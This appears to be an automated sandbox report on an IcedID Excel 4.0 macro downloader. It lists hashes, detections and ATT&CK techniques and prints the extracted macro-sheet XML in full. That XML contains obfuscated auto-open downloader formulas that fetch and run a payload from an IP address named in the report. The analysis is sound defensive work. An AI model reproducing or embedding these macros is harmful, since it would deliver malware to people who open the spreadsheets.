IcedID Office (OOXML) malware analysis — malicious · 417f594a16445281

MALICIOUS

Office (OOXML)

174.3 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-05-23

MD5: 2a80c36c8fbfcc45204455bf95407596 SHA-1: 4284ea5fa05f419f04b90771380205529acd591e SHA-256: 417f594a164452815cfbfc48471439d4e244706c87683df65c47daad55e67d2e

250 Risk Score

Malware Insights

IcedID · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution T1105 Ingress Tool Transfer

The file contains multiple Excel 4.0 macro sheets, including an Auto_Open defined name, indicating it's designed to execute code upon opening. The macros utilize dangerous functions like FORMULA and EXEC to download a file from the reconstructed URL "http://185.82.127.32/" and save it as ".. to.cersw", then execute it. This behavior is consistent with the IcedID malware family, which often uses macro-enabled documents as a downloader.

Heuristics 6

ClamAV: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0
Excel 4.0 macro sheet (6 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME

Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
Dangerous XLM formula APIs: FORMULA, GOTO, HALT critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 6 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 6

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml	1190 bytes
SHA-256: `e26278d9df62929caddc39c2675d1a93c805965a35896b4c4240468b728373e2`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0000-000000000000}"><dimension ref="A1"/><sheetViews><sheetView showFormulas="1" tabSelected="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="9.140625" style="2"/></cols><sheetData/><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><drawing r:id="rId1"/></xm:macrosheet>
`xlm_sheet_01.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet2.xml	3387 bytes
SHA-256: `11d716cf87c0994c7816faeabea3b1a2311f8469a9e654bc4a6167c25888c333`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0100-000000000000}"><dimension ref="C20:G35"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="5" width="8.7109375" style="1"/><col min="6" max="6" width="9.42578125" style="1" customWidth="1"/><col min="7" max="16384" width="8.7109375" style="1"/></cols><sheetData><row r="20" spans="3:7" s="1" customFormat="1" x14ac:dyDescent="0.25"><c r="F20" s="1" t="b"><f>FORMULA(Sheet000!P16&Sheet000!P17,F27)=PI()=PI()=PI()</f><v>0</v></c></row><row r="23" spans="3:7" s="1" customFormat="1" x14ac:dyDescent="0.25"><c r="F23" s="1" t="str"><f>NOW()&".dat"</f><v>44329,6550195602.dat</v></c></row><row r="25" spans="3:7" s="1" customFormat="1" x14ac:dyDescent="0.25"><c r="C25" s="1" t="s"><v>3</v></c></row><row r="26" spans="3:7" s="1" customFormat="1" x14ac:dyDescent="0.25"><c r="C26" s="1" t="s"><v>5</v></c></row><row r="27" spans="3:7" s="1" customFormat="1" x14ac:dyDescent="0.25"><c r="C27" s="1" t="s"><v>4</v></c><c r="G27" s="1" t="str"><f>"htt"</f><v>htt</v></c></row><row r="28" spans="3:7" s="1" customFormat="1" x14ac:dyDescent="0.25"><c r="C28" s="1" t="s"><v>14</v></c><c r="E28" s="1" t="s"><v>18</v></c><c r="F28" s="1" t="e"><f>JKKHYUGFD(0,G27&G28&E28&F23,"..\lertio.cersw",0,0)</f><v>#NAME?</v></c><c r="G28" s="1" t="s"><v>11</v></c></row><row r="29" spans="3:7" s="1" customFormat="1" x14ac:dyDescent="0.25"><c r="C29" s="1" t="s"><v>17</v></c><c r="E29" s="1" t="s"><v>19</v></c><c r="F29" s="1" t="e"><f>JKKHYUGFD(0,G27&G28&E29&F23,Sheet2!K22,0,0)</f><v>#NAME?</v></c></row><row r="30" spans="3:7" s="1" customFormat="1" x14ac:dyDescent="0.25"><c r="C30" s="1" t="s"><v>16</v></c><c r="E30" s="1" t="s"><v>20</v></c><c r="F30" s="1" t="e"><f>JKKHYUGFD(0,G27&G28&E30&F23,Sheet2!L22,0,0)</f><v>#NAME?</v></c></row><row r="31" spans="3:7" s="1" customFormat="1" x14ac:dyDescent="0.25"><c r="C31" s="1" t="s"><v>0</v></c><c r="E31" s="1" t="s"><v>6</v></c></row><row r="32" spans="3:7" s="1" customFormat="1" x14ac:dyDescent="0.25"><c r="E32" s="1" t="s"><v>6</v></c></row><row r="33" spans="5:6" s="1" customFormat="1" x14ac:dyDescent="0.25"><c r="E33" s="1" t="s"><v>6</v></c></row><row r="35" spans="5:6" s="1" customFormat="1" x14ac:dyDescent="0.25"><c r="F35" s="1" t="e"><f>GOTO(Sheet2!H13)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
`xlm_sheet_02.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet3.xml	2364 bytes
SHA-256: `32e86c8d875e3bc28a2fb3c0512d0cffa7c2a81da63e4fe594ba2772a3b3768c`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0200-000000000000}"><dimension ref="H19:L31"/><sheetViews><sheetView showFormulas="1" topLeftCell="A7" workbookViewId="0"><selection activeCell="A7" sqref="A7"/></sheetView></sheetViews><sheetFormatPr defaultColWidth="8.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="8.140625" style="1"/><col min="8" max="9" width="8.140625" style="1" customWidth="1"/><col min="10" max="16384" width="8.140625" style="1"/></cols><sheetData><row r="19" spans="8:12" x14ac:dyDescent="0.25"><c r="H19" s="1" t="b"><f>FORMULA(Sheet000!J17&Sheet000!J18&Sheet000!J19,H25)=PI()=PI()=PI()</f><v>0</v></c><c r="J19" s="1" t="s"><v>3</v></c></row><row r="20" spans="8:12" x14ac:dyDescent="0.25"><c r="J20" s="1" t="s"><v>12</v></c></row><row r="21" spans="8:12" x14ac:dyDescent="0.25"><c r="J21" s="1" t="s"><v>13</v></c></row><row r="22" spans="8:12" x14ac:dyDescent="0.25"><c r="J22" s="1" t="s"><v>7</v></c><c r="K22" s="1" t="s"><v>10</v></c><c r="L22" s="1" t="s"><v>9</v></c></row><row r="23" spans="8:12" x14ac:dyDescent="0.25"><c r="J23" s="1" t="s"><v>8</v></c></row><row r="24" spans="8:12" x14ac:dyDescent="0.25"><c r="J24" s="1" t="s"><v>2</v></c></row><row r="25" spans="8:12" x14ac:dyDescent="0.25"><c r="J25" s="1" t="s"><v>1</v></c></row><row r="31" spans="8:12" x14ac:dyDescent="0.25"><c r="H31" s="1" t="e"><f>GOTO(Sheet3!G2)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
`xlm_sheet_03.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet4.xml	2025 bytes
SHA-256: `f6023b616a33da16850bd04bca335ab61b8bf9717cbe0a8ef91527cea67ae7fd`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{1155E9B9-B0CD-42F9-A966-3A754062B27E}"><dimension ref="G16:G23"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="7.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="4" width="7.7109375" style="1"/><col min="5" max="5" width="8.85546875" style="1" customWidth="1"/><col min="6" max="6" width="8.42578125" style="1" customWidth="1"/><col min="7" max="7" width="10" style="1" customWidth="1"/><col min="8" max="8" width="8.7109375" style="1" customWidth="1"/><col min="9" max="9" width="7.7109375" style="1"/><col min="10" max="10" width="8.140625" style="1" customWidth="1"/><col min="11" max="11" width="7.7109375" style="1"/><col min="12" max="12" width="8.140625" style="1" customWidth="1"/><col min="13" max="16384" width="7.7109375" style="1"/></cols><sheetData><row r="16" spans="7:7" x14ac:dyDescent="0.25"><c r="G16" s="1" t="b"><f>FORMULA(Sheet000!J17&Sheet000!J21&Sheet000!J19,G19)=PI()=PI()=PI()</f><v>0</v></c></row><row r="23" spans="7:7" x14ac:dyDescent="0.25"><c r="G23" s="1" t="e"><f>GOTO(Sheet4!G5)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
`xlm_sheet_04.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet5.xml	1560 bytes
SHA-256: `d60ca3a864e3f818e7a00f9aa3f6fdbc180e13ef9ef26c0d3de35bf633fcfa97`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{8D29E0F2-14A8-4D3C-A016-AA1287FA05D1}"><dimension ref="G16:G23"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="8" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="8" style="1"/><col min="7" max="7" width="7.85546875" style="1" customWidth="1"/><col min="8" max="16384" width="8" style="1"/></cols><sheetData><row r="16" spans="7:7" x14ac:dyDescent="0.25"><c r="G16" s="1" t="b"><f>FORMULA(Sheet000!J17&Sheet000!J22&Sheet000!J19,G19)=PI()=PI()=PI()</f><v>0</v></c></row><row r="23" spans="7:7" x14ac:dyDescent="0.25"><c r="G23" s="1" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
`xlm_sheet_05.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	1831 bytes
SHA-256: `e39ad03223dbd59846bfcaeec79c94a8bcc60e0526ca5f2965b6b33923361cfa`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{65E179ED-D9FF-4EED-BC75-2D2CB5EF5CA2}"><dimension ref="A10:B15"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"><selection activeCell="A2" sqref="A2"/></sheetView></sheetViews><sheetFormatPr defaultColWidth="8.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="1" width="9.140625" style="1" customWidth="1"/><col min="2" max="3" width="8.28515625" style="1"/><col min="4" max="4" width="9.5703125" style="1" customWidth="1"/><col min="5" max="5" width="10.42578125" style="1" customWidth="1"/><col min="6" max="16384" width="8.28515625" style="1"/></cols><sheetData><row r="10" spans="1:2" x14ac:dyDescent="0.25"><c r="A10" s="1" t="b"><f>PI()=ON.TIME(NOW()+"00:00:02",B10)=PI()</f><v>0</v></c><c r="B10" s="1" t="s"><v>15</v></c></row><row r="15" spans="1:2" x14ac:dyDescent="0.25"><c r="A15" s="1" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.